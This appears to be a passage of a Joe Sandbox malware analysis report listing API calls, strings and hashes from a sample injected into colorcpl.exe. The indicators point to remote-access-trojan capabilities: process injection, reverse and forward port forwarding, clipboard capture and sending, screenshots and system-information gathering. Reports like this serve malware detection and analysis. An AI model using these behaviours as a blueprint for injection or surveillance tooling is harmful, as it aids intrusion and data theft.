• Instruction ID: 1550c2340ed907c8a2f4c915cd7e69f6c8eeff5dcd252ac0dd7b482532ae6bc6
• Opcode Fuzzy Hash: 307c18906ff478f6870dfeb6081551c927e46615278092d5e5868d331fc606d7
• Instruction Fuzzy Hash: 0B418071A042016BDB14FB74D8598AF77A9EF86608F40091DE55397290FF38AD09C79A
Uniqueness
Uniqueness Score: -1.00%
APIs
• CreateFileMappingW.KERNEL32(?,00000000,00000002,00000000,00000000,00000000), ref: 04673417
• MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 04673425
• GetFileSize.KERNEL32(?,00000000), ref: 04673432
• UnmapViewOfFile.KERNEL32(00000000), ref: 04673452
• CloseHandle.KERNEL32(00000000), ref: 0467345F
• CloseHandle.KERNEL32(?), ref: 04673465
Memory Dump Source
• Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
Yara matches
Similarity
• API ID: File$CloseHandleView$CreateMappingSizeUnmap
                                                                                                                              • String ID:
Uniqueness

Uniqueness Score: -1.00%

APIs
• OpenSCManagerW.ADVAPI32(00000000,00000000,00000011,00000000,00000001,?,?,?,?,?,?,0467A486,00000000), ref: 0467AB1C
• OpenServiceW.ADVAPI32(00000000,00000000,000F003F,?,?,?,?,?,?,0467A486,00000000), ref: 0467AB33
• CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0467A486,00000000), ref: 0467AB40
• ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0467A486,00000000), ref: 0467AB4F
• CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0467A486,00000000), ref: 0467AB60
• CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0467A486,00000000), ref: 0467AB63
Memory Dump Source
• Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
Yara matches
Similarity
• API ID: Service$CloseHandle$Open$ControlManager
• String ID:
Uniqueness

Uniqueness Score: -1.00%

APIs
• _free.LIBCMT ref: 046A8135
  • Part of subcall function 046A6782: RtlFreeHeap.NTDLL(00000000,00000000,?,046B0C6F,0000000A,00000000,0000000A,00000000,?,046B0F13,0000000A,00000007,0000000A,?,046B145E,0000000A), ref: 046A6798
  • Part of subcall function 046A6782: GetLastError.KERNEL32(0000000A,?,046B0C6F,0000000A,00000000,0000000A,00000000,?,046B0F13,0000000A,00000007,0000000A,?,046B145E,0000000A,0000000A), ref: 046A67AA
• _free.LIBCMT ref: 046A8141
• _free.LIBCMT ref: 046A814C
• _free.LIBCMT ref: 046A8157
• _free.LIBCMT ref: 046A8162
• _free.LIBCMT ref: 046A816D
• _free.LIBCMT ref: 046A8178
• _free.LIBCMT ref: 046A8183
• _free.LIBCMT ref: 046A818E
• _free.LIBCMT ref: 046A819C
Memory Dump Source
• Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
Yara matches
Similarity
• API ID: _free$ErrorFreeHeapLast
• String ID:
Uniqueness

Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000005.00000002.4443972597.00000000066E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 066E0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_66e0000_colorcpl.jbxd
Yara matches
Similarity
• API ID: _free
• String ID:
Uniqueness

Uniqueness Score: -1.00%

APIs
• __Init_thread_footer.LIBCMT ref: 066E63F2
• __Init_thread_footer.LIBCMT ref: 066E642F
  • Part of subcall function 0671547C: __onexit.LIBCMT ref: 06715482
Strings
Memory Dump Source
• Source File: 00000005.00000002.4443972597.00000000066E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 066E0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_66e0000_colorcpl.jbxd
Yara matches
Similarity
• API ID: Init_thread_footer$__onexit
• String ID: 0lG$0lG$0lG$0lG$0lG$kG
Uniqueness

Uniqueness Score: -1.00%

APIs
• __EH_prolog.LIBCMT ref: 04679FB9
• GdiplusStartup.GDIPLUS(046D4ACC,?,00000000), ref: 04679FEB
• CreateDirectoryW.KERNEL32(00000000,00000000,00000000,0000001A,00000019), ref: 0467A077
• Sleep.KERNEL32(000003E8), ref: 0467A0FD
• GetLocalTime.KERNEL32(?), ref: 0467A105
• Sleep.KERNEL32(00000000,00000018,00000000), ref: 0467A1F4
Strings
Memory Dump Source
• Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
Yara matches
Similarity
• API ID: Sleep$CreateDirectoryGdiplusH_prologLocalStartupTime
• String ID: time_%04i%02i%02i_%02i%02i%02i$wnd_%04i%02i%02i_%02i%02i%02i
Uniqueness

Uniqueness Score: -1.00%

APIs
• DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,046B6FFF), ref: 046B5F27
Strings
Memory Dump Source
• Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
Yara matches
Similarity
• API ID: DecodePointer
• String ID: acos$asin$exp$log$log10$pow$sqrt
Uniqueness

Uniqueness Score: -1.00%

APIs
• ShellExecuteW.SHELL32(00000000,open,dxdiag,00000000,00000000,00000000), ref: 046774F5
  • Part of subcall function 0467C485: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,0466A843), ref: 0467C49E
• Sleep.KERNEL32(00000064), ref: 04677521
• DeleteFileW.KERNEL32(00000000), ref: 04677555
Strings
Memory Dump Source
• Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
Yara matches
Similarity
• API ID: File$CreateDeleteExecuteShellSleep
• String ID: /t $\sysinfo.txt$dxdiag$open$temp
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetCurrentProcess.KERNEL32(046D2B14,00000000,046D52D8,00003000,00000004,00000000,00000001), ref: 046673DD
• GetCurrentProcess.KERNEL32(046D2B14,00000000,00008000,?,00000000,00000001,00000000,04667656,C:\Windows\SysWOW64\colorcpl.exe), ref: 0466749E
Strings
Memory Dump Source
• Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
Yara matches
Similarity
• API ID: CurrentProcess
• String ID: PEB: %x$[+] NtAllocateVirtualMemory Success$[-] NtAllocateVirtualMemory Error$\explorer.exe$explorer.exe$windir
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 5891da2d8b53be71c2007c00cf07af27521d245dc984af3e7daebc16673f8621
                                                                                                                              • Instruction ID: 4723af2d2e9d3161e76594d9187431707b954564193e8c7a229a43741450220c
                                                                                                                              • Opcode Fuzzy Hash: 5891da2d8b53be71c2007c00cf07af27521d245dc984af3e7daebc16673f8621
                                                                                                                              • Instruction Fuzzy Hash: 8EC1D270E04649AFDF11DFA8D840BADBBB5BF1A304F044199E951A7381E734AD62CF64
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              APIs
                                                                                                                              • GetCPInfo.KERNEL32(00000000,00000001,?,7FFFFFFF,?,?,046B405C,00000000,00000000,?,00000001,?,?,?,?,00000001), ref: 046B3E2F
                                                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000001,00000000,00000000,?,046B405C,00000000,00000000,?,00000001,?,?,?,?), ref: 046B3EB2
                                                                                                                              • __alloca_probe_16.LIBCMT ref: 046B3EEA
                                                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000001,00000000,046B405C,?,046B405C,00000000,00000000,?,00000001,?,?,?,?), ref: 046B3F45
                                                                                                                              • __alloca_probe_16.LIBCMT ref: 046B3F94
                                                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,046B405C,00000000,00000000,?,00000001,?,?,?,?), ref: 046B3F5C
                                                                                                                                • Part of subcall function 046A6137: HeapAlloc.KERNEL32(00000000,0469529C,?,?,04698847,?,?,?,?,?,0466DE62,0469529C,?,?,?,?), ref: 046A6169
                                                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,046B405C,00000000,00000000,?,00000001,?,?,?,?), ref: 046B3FD8
                                                                                                                              • __freea.LIBCMT ref: 046B4003
                                                                                                                              • __freea.LIBCMT ref: 046B400F
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: ByteCharMultiWide$__alloca_probe_16__freea$AllocHeapInfo
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3256262068-0
                                                                                                                              • Opcode ID: ad8cede54684b2a497f8d7635b9b1280f6fad5f2e22ab2486784db23f7bbe25f
                                                                                                                              • Instruction ID: 89b6afeffd76a7d761820c64889fa1995037cced018881d298bf1492e02a944c
                                                                                                                              • Opcode Fuzzy Hash: ad8cede54684b2a497f8d7635b9b1280f6fad5f2e22ab2486784db23f7bbe25f
                                                                                                                              • Instruction Fuzzy Hash: D7919171F00616AADB218E65CC40AEEBBB59B19314F08055AED81E7381FB25ECC1CBE0
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              APIs
                                                                                                                                • Part of subcall function 046A8215: GetLastError.KERNEL32(?,0469F720,0469A7F5,0469F720,046D4EF8,?,0469CE15,FF8BC35D,046D4EF8,046D4EF8), ref: 046A8219
                                                                                                                                • Part of subcall function 046A8215: _free.LIBCMT ref: 046A824C
                                                                                                                                • Part of subcall function 046A8215: SetLastError.KERNEL32(00000000,FF8BC35D,046D4EF8,046D4EF8), ref: 046A828D
                                                                                                                                • Part of subcall function 046A8215: _abort.LIBCMT ref: 046A8293
                                                                                                                              • _memcmp.LIBVCRUNTIME ref: 046A5423
                                                                                                                              • _free.LIBCMT ref: 046A5494
                                                                                                                              • _free.LIBCMT ref: 046A54AD
                                                                                                                              • _free.LIBCMT ref: 046A54DF
                                                                                                                              • _free.LIBCMT ref: 046A54E8
                                                                                                                              • _free.LIBCMT ref: 046A54F4
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: _free$ErrorLast$_abort_memcmp
                                                                                                                              • String ID: C
                                                                                                                              • API String ID: 1679612858-1037565863
                                                                                                                              • Opcode ID: 194b6995c20be89b233c1f80809dc7104717a3d58a7801768a0b4900939ec088
                                                                                                                              • Instruction ID: 84b645cc754c8a690f0dbf6e49814e72a362f0607b7f274a122b1f546f4580c4
                                                                                                                              • Opcode Fuzzy Hash: 194b6995c20be89b233c1f80809dc7104717a3d58a7801768a0b4900939ec088
                                                                                                                              • Instruction Fuzzy Hash: 7DB12A75A01619ABDB24DF18C884AADB7B4FF58308F54459ED94AA7350F770BEA0CF80
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443972597.00000000066E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 066E0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_66e0000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: _free$_abort_memcmp
                                                                                                                              • String ID: C
                                                                                                                              • API String ID: 137591632-1037565863
                                                                                                                              • Opcode ID: 3b59ec677d4d175c50db296303e2411e5fb3dbfaa0361dba4d40d6cf04aba7d4
                                                                                                                              • Instruction ID: 921af8970de8acccb8ce19ed01bef9556cc0cd088d6fadd2098abfe03b79d333
                                                                                                                              • Opcode Fuzzy Hash: 3b59ec677d4d175c50db296303e2411e5fb3dbfaa0361dba4d40d6cf04aba7d4
                                                                                                                              • Instruction Fuzzy Hash: 09B11B75D1122A9FDB64DF18CC88AADB7B5FF08314F5485AAD909A7350E731AE90CF80
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: tcp$udp
                                                                                                                              • API String ID: 0-3725065008
                                                                                                                              • Opcode ID: 911248b39c816d676608a16717375c66a2b73c502abb2cde02de43239e8464de
                                                                                                                              • Instruction ID: 3c093848b069a6f58130832a100a70d8c4f9783501a9df4f9aebaf64361c16c6
                                                                                                                              • Opcode Fuzzy Hash: 911248b39c816d676608a16717375c66a2b73c502abb2cde02de43239e8464de
                                                                                                                              • Instruction Fuzzy Hash: 76716A706083028FDB24CE25C988B2AB7E4EFA8745F14442EF89587355FB74ED45CB96
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: Eventinet_ntoa
                                                                                                                              • String ID: GetDirectListeningPort$StartForward$StartReverse$StopForward$StopReverse
                                                                                                                              • API String ID: 3578746661-168337528
                                                                                                                              • Opcode ID: f89dd5b6e52cef669cd19eae2fc469f56f437c6b5894760aec6a2895f0be6240
                                                                                                                              • Instruction ID: 9faaefdef4ffd3ab857edfe375034314e12ab3bb28c2061e0e9788a491779e66
                                                                                                                              • Opcode Fuzzy Hash: f89dd5b6e52cef669cd19eae2fc469f56f437c6b5894760aec6a2895f0be6240
                                                                                                                              • Instruction Fuzzy Hash: DF519031B042445BEB14FB38C869ABE36A5EB96608F40455EE403977D0FF78BD06C79A
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              APIs
                                                                                                                                • Part of subcall function 04677F2C: __EH_prolog.LIBCMT ref: 04677F31
                                                                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF,00000070,Function_000660A4), ref: 04677DDC
                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 04677DE5
                                                                                                                              • DeleteFileA.KERNEL32(00000000), ref: 04677DF4
                                                                                                                              • ShellExecuteExA.SHELL32(0000003C,00000000,00000010,?,?,?), ref: 04677DA8
                                                                                                                                • Part of subcall function 04664AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 04664B36
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: CloseDeleteExecuteFileH_prologHandleObjectShellSingleWaitsend
                                                                                                                              • String ID: <$@$Temp
                                                                                                                              • API String ID: 1704390241-1032778388
                                                                                                                              • Opcode ID: dc36b04a1622b40a4911fe71cd95f332d76075c5405ff7000b71c829dbe9c283
                                                                                                                              • Instruction ID: 783bbeb7fc4e6f07dc1bc1213097065ffe2cbf3f1843d0f3d0c0f38672938098
                                                                                                                              • Opcode Fuzzy Hash: dc36b04a1622b40a4911fe71cd95f332d76075c5405ff7000b71c829dbe9c283
                                                                                                                              • Instruction Fuzzy Hash: B9414931E00209ABEB14FB60DD65AFDB778AF51319F40416CE50B66190FF743A9ACB98
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              APIs
                                                                                                                              • CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000,00000000,046D4EE0,Function_00065FA4,?,00000000,04667FFC,00000000), ref: 046679C5
                                                                                                                              • WriteFile.KERNEL32(00000000,?,00000000,000186A0,00000000,?,000186A0,?,?,00000000,04667FFC,00000000,?,?,0000000A,00000000), ref: 04667A0D
                                                                                                                                • Part of subcall function 04664AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 04664B36
                                                                                                                              • CloseHandle.KERNEL32(00000000,?,00000000,04667FFC,00000000,?,?,0000000A,00000000), ref: 04667A4D
                                                                                                                              • MoveFileW.KERNEL32(00000000,00000000), ref: 04667A6A
                                                                                                                              • CloseHandle.KERNEL32(00000000,00000057,?,00000008,?,?,?,?,?,?,?,0000000A,00000000), ref: 04667A95
                                                                                                                              • DeleteFileW.KERNEL32(00000000,?,?,?,?,?,?,?,0000000A,00000000), ref: 04667AA5
                                                                                                                                • Part of subcall function 04664B96: WaitForSingleObject.KERNEL32(?,000000FF,?,046D4EF8,04664C49,00000000,?,?,?,046D4EF8,0466530B), ref: 04664BA5
                                                                                                                                • Part of subcall function 04664B96: SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0466548B), ref: 04664BC3
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: File$CloseHandle$CreateDeleteEventMoveObjectSingleWaitWritesend
                                                                                                                              • String ID: .part
                                                                                                                              • API String ID: 1303771098-3499674018
                                                                                                                              • Opcode ID: 9503e0f6a6239eb1f7d57b1feebe291f63f83747b4ae06ccf5fb4d66f131faad
                                                                                                                              • Instruction ID: fcf872241c9818fd11c4083e712781594d94cbc201015edd3dc1d01ded59c9bf
                                                                                                                              • Opcode Fuzzy Hash: 9503e0f6a6239eb1f7d57b1feebe291f63f83747b4ae06ccf5fb4d66f131faad
                                                                                                                              • Instruction Fuzzy Hash: 77318971508340AFD310EB20D8949DBB7E8FF9531AF004A1DB58692150FF74AA48CB9A
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              APIs
                                                                                                                              • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,0469EA24,0469EA24,?,?,?,046AAE9A,00000001,00000001,73E85006), ref: 046AACA3
                                                                                                                              • __alloca_probe_16.LIBCMT ref: 046AACDB
                                                                                                                              • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,046AAE9A,00000001,00000001,73E85006,?,?,?), ref: 046AAD29
                                                                                                                              • __alloca_probe_16.LIBCMT ref: 046AADC0
                                                                                                                              • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,73E85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 046AAE23
                                                                                                                              • __freea.LIBCMT ref: 046AAE30
                                                                                                                                • Part of subcall function 046A6137: HeapAlloc.KERNEL32(00000000,0469529C,?,?,04698847,?,?,?,?,?,0466DE62,0469529C,?,?,?,?), ref: 046A6169
                                                                                                                              • __freea.LIBCMT ref: 046AAE39
                                                                                                                              • __freea.LIBCMT ref: 046AAE5E
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocHeap
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2597970681-0
                                                                                                                              • Opcode ID: d287e7e0d7a1fe189e3d4efce1d322448a75d5fe5e992b03d6e835d303e769a2
                                                                                                                              • Instruction ID: b24a8d23e02aa025af9df6d2e85340a248a4e6f451a7a4c30e978295de0534f4
                                                                                                                              • Opcode Fuzzy Hash: d287e7e0d7a1fe189e3d4efce1d322448a75d5fe5e992b03d6e835d303e769a2
                                                                                                                              • Instruction Fuzzy Hash: 0C510872600616ABEF255FA0CC40EBBB7A9EB54710B14462EFC05D6250FB74EC61DE60
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              APIs
                                                                                                                              • SendInput.USER32(00000001,?,0000001C,?,?,00000000), ref: 046799CC
                                                                                                                              • SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 046799ED
                                                                                                                              • SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 04679A0D
                                                                                                                              • SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 04679A21
                                                                                                                              • SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 04679A37
                                                                                                                              • SendInput.USER32(00000001,?,0000001C,?,?,00000000), ref: 04679A54
                                                                                                                              • SendInput.USER32(00000001,?,0000001C,?,?,00000000), ref: 04679A6F
                                                                                                                              • SendInput.USER32(00000001,?,0000001C,?,00000000), ref: 04679A8B
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: InputSend
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3431551938-0
                                                                                                                              • Opcode ID: cc92c966b2d8ff821d5bb9f222ccf3b0a77b561117866d57e9754a1f6ee20d00
                                                                                                                              • Instruction ID: 42a0b29dac3258eab7db12d23474f0d722457c56f917e053395b261769b1a8fc
                                                                                                                              • Opcode Fuzzy Hash: cc92c966b2d8ff821d5bb9f222ccf3b0a77b561117866d57e9754a1f6ee20d00
                                                                                                                              • Instruction Fuzzy Hash: 3731A1715583086EF311CF51D881BEBBBDCEF98B54F00080EF6808A181D2A2A5C98BA3
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              APIs
                                                                                                                              • OpenClipboard.USER32 ref: 04676941
                                                                                                                              • EmptyClipboard.USER32 ref: 0467694F
                                                                                                                              • CloseClipboard.USER32 ref: 04676955
                                                                                                                              • OpenClipboard.USER32 ref: 0467695C
                                                                                                                              • GetClipboardData.USER32(0000000D), ref: 0467696C
                                                                                                                              • GlobalLock.KERNEL32(00000000), ref: 04676975
                                                                                                                              • GlobalUnlock.KERNEL32(00000000), ref: 0467697E
                                                                                                                              • CloseClipboard.USER32 ref: 04676984
                                                                                                                                • Part of subcall function 04664AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 04664B36
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: Clipboard$CloseGlobalOpen$DataEmptyLockUnlocksend
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2172192267-0
                                                                                                                              • Opcode ID: 09d58221939ca38ba57779307cad4baef4d413e895a1ff2d547c4f6c5490101d
                                                                                                                              • Instruction ID: 0a267af602b94c51547dc6a1e95b0353093281b292480be306c6f9ad39797fb6
                                                                                                                              • Opcode Fuzzy Hash: 09d58221939ca38ba57779307cad4baef4d413e895a1ff2d547c4f6c5490101d
                                                                                                                              • Instruction Fuzzy Hash: 8B0171B12143009FE714BB70D8486BE77A9EF95705F40141DE607C2190FF38AC48CAA5
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: _free
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 269201875-0
                                                                                                                              • Opcode ID: ddfebc8e915e9604b9b9c6f47dd6507fc3dedd16616b7cdd95a6b4b99a323d94
                                                                                                                              • Instruction ID: 85a667752bff3c384cfc8451a98b944430ad2ce8cc296373d25ec112a008af9e
                                                                                                                              • Opcode Fuzzy Hash: ddfebc8e915e9604b9b9c6f47dd6507fc3dedd16616b7cdd95a6b4b99a323d94
                                                                                                                              • Instruction Fuzzy Hash: AE61B175E00205AFEB20CF68C841BDABBF4EB15714F1441AAE994EB352F771AD818BD4
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443972597.00000000066E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 066E0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_66e0000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: _free
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 269201875-0
                                                                                                                              • Opcode ID: bf6a2d62285109b65615641ef8a9ee438ca725d72dbf644c1fcc8e573ee560d0
                                                                                                                              • Instruction ID: 040af76ab1abc9b90ea1d00734cd042e1c305edcde5c8a9c9bcf3cb28ecb043d
                                                                                                                              • Opcode Fuzzy Hash: bf6a2d62285109b65615641ef8a9ee438ca725d72dbf644c1fcc8e573ee560d0
                                                                                                                              • Instruction Fuzzy Hash: 4B61F775D00369AFDBA0CF68CC41BAEBBF5EF04720F544169EA54EB242E7309941CB90
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              APIs
                                                                                                                              • GetConsoleCP.KERNEL32(FF8BC35D,00000000,?,?,?,?,?,?,?,046ABB31,?,00000000,FF8BC35D,00000000,00000000,FF8BC369), ref: 046AB3FE
                                                                                                                              • __fassign.LIBCMT ref: 046AB479
                                                                                                                              • __fassign.LIBCMT ref: 046AB494
                                                                                                                              • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,FF8BC35D,00000005,00000000,00000000), ref: 046AB4BA
                                                                                                                              • WriteFile.KERNEL32(?,FF8BC35D,00000000,046ABB31,00000000,?,?,?,?,?,?,?,?,?,046ABB31,?), ref: 046AB4D9
                                                                                                                              • WriteFile.KERNEL32(?,?,00000001,046ABB31,00000000,?,?,?,?,?,?,?,?,?,046ABB31,?), ref: 046AB512
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1324828854-0
                                                                                                                              • Opcode ID: b947fc6d8ac663bf2065c7bb8ccfdf939ce5e4c804513a338766b42ec6dce31f
